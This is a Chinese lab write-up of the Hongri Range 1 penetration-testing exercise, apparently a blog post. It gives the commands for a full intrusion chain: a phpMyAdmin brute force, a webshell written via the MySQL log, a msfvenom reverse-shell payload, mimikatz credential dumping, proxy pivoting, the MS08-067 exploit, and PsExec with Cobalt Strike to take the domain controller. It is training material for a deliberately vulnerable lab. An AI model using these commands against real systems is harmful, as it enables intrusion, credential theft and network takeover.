红日靶场1实战经验

红日靶场一

  • 0x00前言
  • 0x01环境搭建
  • 0x02web渗透
    • 1 信息收集
      • 1.1探测内网存活
      • 1.2端口扫描
      • 1.2.1 masscan扫描
      • 1.2.2 nmap扫描
      • 1.2.3 访问80端口
      • 1.2.4 目录爆破 看还存在扫描页面
        • 服务漏洞利用思路
    • 2 漏洞利用
      • 2.1 探测phpmyadmin页面
      • 2.1 phpmyadmin漏洞利用
        • 2.1.1 看是否可以写入文件
        • 2.1.2 尝试用日志写入木马getshell
        • 2.1.3 蚁剑连接
    • 3 拿下webshell后信息收集
      • 3.1 是否存在域
      • 3.2 网络连接情况 进程 杀软 服务 是否可以出网 用户开放情况
      • 3.3 翻文件 txt 类型的 看是否有密码
  • 0x03后渗透
    • 1.msf上线
    • 2.msf信息收集
    • 3.提权
    • 4.抓取域用户的密码信息
    • 5.知道密码后 可以通过3389连接
      • 5.1 检查3389是否开启
    • 6 跨网段横向渗透
      • 6.1 msf socks4a proxychains 穿透内网
      • 6.2测试是否成功
      • 6.3 登录后 进行域内信息收集
    • 7 跨网段主机信息收集
      • 7.1 内网存活主机探测
      • 7.2 内网存活主机端口扫描
      • 7.3 内网存活主机服务探测
    • 8.横向渗透
      • 8.1 MS08_067拿下域成员服务器
      • 8.2 拿下域控
        • 8.2.1 msf派生给cs
        • 8.2.2 cs基于web服务器生成监听器
        • 8.2.3 psexec攻击


0x00前言

靶场地址
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
感谢红日团队提供的靶场
靶机初始密码 均为 hongrisec@2019


0x01环境搭建

VMwareWorkstation搭建

攻击机		kali	ip	 192.168.157.137
web服务器	win7	ip	 192.168.157.153	192.168.52.143
域成员		win2003	ip	 					192.168.52.141
域控			win2008	ip						192.168.52.138

win7 web虚拟机 开启 phpstudy服务

网络拓扑如下

红日靶场1实战经验_第1张图片

0x02web渗透

1 信息收集

1.1探测内网存活

netdiscover -i eth0 -r 192.168.157.0/24

红日靶场1实战经验_第2张图片
192.168.157.153为目标机器ip

1.2端口扫描

masscan扫描速度快 可先用masscan扫描开放的端口
再用nmap扫描详细信息

1.2.1 masscan扫描

masscan 192.168.157.153 -p 1-65535 --rate=1000
如果是真实机 会存在rate过高可能会被封,可以调低一点
红日靶场1实战经验_第3张图片
扫出80和3306端口

1.2.2 nmap扫描

nmap -sC -sV -p 80,3306 192.168.157.153 -o 192.168.157.153.txt
红日靶场1实战经验_第4张图片
开启 80 和3306
可以看到 是phpstudy 搭建的

1.2.3 访问80端口

是一个phpstudy探针页面
可以看到 服务器信息 网站路径
红日靶场1实战经验_第5张图片

1.2.4 目录爆破 看还存在扫描页面

使用御剑目录扫描进行目录爆破
或者kali自带的 dirbuster红日靶场1实战经验_第6张图片
扫出phpmyadmin 页面

服务漏洞利用思路

如果 可以登录进去 就可以 执行数据库命令 。
权限够的话
可以 通过 写入 一句话木马文件, into outfile into dumpfile
或者开启日志记录,写入一句话木马 进行连接。

2 漏洞利用

2.1 探测phpmyadmin页面

访问成功
尝试 暴力破解登录
如下两图
红日靶场1实战经验_第7张图片

红日靶场1实战经验_第8张图片
爆破出弱口令 root root

select user() 命令 为 root用户登录
红日靶场1实战经验_第9张图片

2.1 phpmyadmin漏洞利用

2.1.1 看是否可以写入文件

mysql   into写入文件:使用需看要secure_file_priv的值。
	value为“null”时,不允许读取任意文件
	value为其余路径时,表示该路径可以读写文件
	value为“空”时,允许读取任意文件

用show global variables like '%secure%' 命令查看

红日靶场1实战经验_第10张图片
为NULL不可写入文件
要想修改 Value值 只能通过配置文件 mysql.ini 修改
放弃

2.1.2 尝试用日志写入木马getshell

开启mysql日志功能:

	1.查看日志功能是否开启
	show global variables like '%general%'
	2.未开启的话设置为 on
	set global general_log='ON'
	3.开启后将日志文件的存储位置改为可访问到的目录, 根目录即可
	set global  general_log_file = 'C:/phpStudy1/WWW/3.php'
	4.执行下边一句话木马 
	数据库将会将查询语句保存在日志文件中
	SELECT ''
	5.写入成功后 使用蚁剑连接

红日靶场1实战经验_第11张图片
红日靶场1实战经验_第12张图片
红日靶场1实战经验_第13张图片
红日靶场1实战经验_第14张图片
均执行成功

2.1.3 蚁剑连接

红日靶场1实战经验_第15张图片
红日靶场1实战经验_第16张图片
连接webshell成功

3 拿下webshell后信息收集

3.1 是否存在域

判断方法
1.whoami hostname   对比
2.ipconfig /all 看DNS
3.systeminfo  看是否有域一栏

在这里插入图片描述
红日靶场1实战经验_第17张图片

3.2 网络连接情况 进程 杀软 服务 是否可以出网 用户开放情况

1.ipconfig 看所处网段是否有多个
2.netstat -ano 查看网络连接和开放端口
3.net start  查看启动的服务  用于提权
4.tasklist   查看开启的进程
5.tasklist /SVC 复制到在线杀软识别 看存在的杀软情况  https://i.hacking8.com/tiquan
6. ping baidu  看是否可以出网等 
7. net user   存在用户

3.3 翻文件 txt 类型的 看是否有密码

后续补充

因为在域内 所以 有必要进行后渗透 拿下域控

0x03后渗透

1.msf上线

生成exe木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.157.137 LPORT=2333 -f exe > hack.exe 
开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 2333
set lhost 192.168.157.137
exploit -j

红日靶场1实战经验_第18张图片

将生成的exe木马通过蚁剑上传到 目标服务器 执行
红日靶场1实战经验_第19张图片
在这里插入图片描述

成功上线
红日靶场1实战经验_第20张图片

可输入 ?查看 可执行的命令

红日靶场1实战经验_第21张图片

2.msf信息收集

1.msf arp 发现主机  开机状态下才可探测出 我现在只开了ip141的 所以下图只扫出141
	run arp_scanner -r  192.168.52.0/24
	
2.run post/multi/recon/local_exploit_suggester      查看msf的提权

红日靶场1实战经验_第22张图片

红日靶场1实战经验_第23张图片

3.提权

getuid查看服务器权限
getsystem 提权
getuid 查看是否提权成功

在这里插入图片描述

4.抓取域用户的密码信息

以下3种都可尝试
1.ruan hashdump
2.加载 kiwi模块
load kiwi     加载kiwi模块
creds_all    列出所有凭据
3.加载mimikatz模块
Windows10/2012 以下的版本可以直接抓取明文密码
	再尝试加载 mimikatz 模块,加载模块前需要先将meterpreter迁移到64位的进程,
	而且该进程也需要 是system权限运行的。 
	ps 查看进程
migrate PID 
load mimikatz 
mimikatz_command -f sekurlsa::searchPasswords

红日靶场1实战经验_第24张图片

红日靶场1实战经验_第25张图片

5.知道密码后 可以通过3389连接

5.1 检查3389是否开启

nmap -p 3389 192.168.157.153
filtered 被过滤 应该是 防火墙阻拦
红日靶场1实战经验_第26张图片### 4.2开启3389
run post/windows/manage/enable_rdp
再次扫描已经开启
在这里插入图片描述
红日靶场1实战经验_第27张图片

6 跨网段横向渗透

6.1 msf socks4a proxychains 穿透内网

添加路由
1. run autoroute -s 192.168.52.0/24		添加路由
2. run autorout -p       查看是否添加成功 
3. background           返回
4. route print			输出路由
5. use auxiliary/server/socks4a		使用 socks4a模块
6. set srvport 1080		设置端口1080
7. run		运行

红日靶场1实战经验_第28张图片
添加成功

红日靶场1实战经验_第29张图片

配置 kali socks代理
配置proxychains:

vi /etc/proxychains.conf 

在这里插入图片描述

6.2测试是否成功

proxychains curl 192.168.52.143
访问成功 说明 代理添加成功
Proxychains nmap -sT -Pn 192.168.52.143

红日靶场1实战经验_第30张图片
红日靶场1实战经验_第31张图片
红日靶场1实战经验_第32张图片

6.3 登录后 进行域内信息收集

net time /domain        #查看时间服务器
net user /domain        #查看域用户
net view /domain        #查看有几个域
net view /domain:GOD  #查看GOD	域情况
nslookup  主机名	 		#查看域内其他主机  可能ip查不出来
net group "domain computers" /domain         #查看域内所有的主机名
net group "domain admins"   /domain          #查看域管理员
net group "domain controllers" /domain       #查看域控

7 跨网段主机信息收集

7.1 内网存活主机探测

auxiliary/scanner/discovery/udp_sweep    #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe    #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname         #基于netbios协议发现内网存活主机

7.2 内网存活主机端口扫描

proxychains nmap -Pn -sT 192.168.52.141
auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描(默认扫描1-10000)

红日靶场1实战经验_第33张图片

7.3 内网存活主机服务探测

auxiliary/scanner/ftp/ftp_version            #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version            #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version      #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp                #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version          #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title                 #探测内网http服务的标题
auxiliary/scanner/smb/smb_version            #发现内网smb服务,基于默认的445端口   
auxiliary/scanner/mssql/mssql_schemadump     #发现内网SQLServer服务,基于默认的1433端口
auxiliary/scanner/oracle/oracle_hashdump     #发现内网oracle服务,基于默认的1521端口 
auxiliary/scanner/mysql/mysql_version        #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner            #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server         #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version            #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/netbios/nbname             #探测内网主机的netbios名字

8.横向渗透

8.1 MS08_067拿下域成员服务器

MS08-067漏洞将会影响除Windows Server 2008 Core以下的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

use exploit/windows/smb/ms08_067_netapi
set rhost 192.168.52.141
set payload windows/meterpreter/bind_tcp
run

红日靶场1实战经验_第34张图片
不稳定会掉
也会出现弹窗
在这里插入图片描述

8.2 拿下域控

8.2.1 msf派生给cs

use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http 
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新 的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true 
set lhost 192.168.157.137 #cobaltstrike监听的ip 
set lport 14444 #cobaltstrike监听的端口 
set session 1 #这里是获得的session的id 
exploit

红日靶场1实战经验_第35张图片
在这里插入图片描述

cs上线成功

8.2.2 cs基于web服务器生成监听器

红日靶场1实战经验_第36张图片

8.2.3 psexec攻击

Psexec针对远程建立连接的方式有两种,一种先建立IPC通道连接,然后直接使用,操作如下:
net use \\192.168.0.1\ipc$ “password” /user:administrator
psexec.exe \\192.168.0.1 cmd                   进入半交互式cmdshell  ;
另一种时在psexec的参数中指定账户密码    操作如下:
psexec.exe \\192.168.0.1 –u administrator –p password
命令参考
https://www.cnblogs.com/wuyuan2011woaini/p/9561122.html

通过蚁剑上传psexec64.exe 到web服务器

web执行 psexec命令

1.#上传木马文件
PsExec64.exe -accepteula \\192.168.52.138 -u god\administrator -p hongrisec@2020 -d -c C:\windows\temp\beacon64.exe
2.#打开 域控cmd  并执行 上线
PsExec64.exe -accepteula \\192.168.52.138 -u god\administrator -p hongrisec@2020 -s cmd
cd..                 #返回到上级 c:/windows目录
dir | findstr beacon		#看是否上传beacon32.exe成功
beacon64.exe				#执行

红日靶场1实战经验_第37张图片
如上图显示这样就上传成功可以 连接cmd查看 c:\wndows目录下 是否存在 存在就执行

红日靶场1实战经验_第38张图片

发现并未上线。
思考原因

因为使用的是 反向连接的木马 
可以web服务器关闭防火墙 或者 开启 监听端口 
NetSh Advfirewall set allprofiles state off  #关闭防火墙
Netsh Advfirewall show allprofiles            #查看防火墙状态
域控服务器执行exe后,反向链接192.168.52.143 的 55555端口 
而 web服务器 防火墙处于开启状态,可以放开 55555端口 在运行看是否上线成功
web服务器输入以下命令开启 或者手动开启
netsh advfirewall firewall add rule name="beacon" dir=in protocol=tcp localport=55555 action=allow

关闭后在运行
成功上线

在这里插入图片描述

拿下域控

红日靶场1实战经验_第39张图片

你可能感兴趣的:(靶机实战,安全)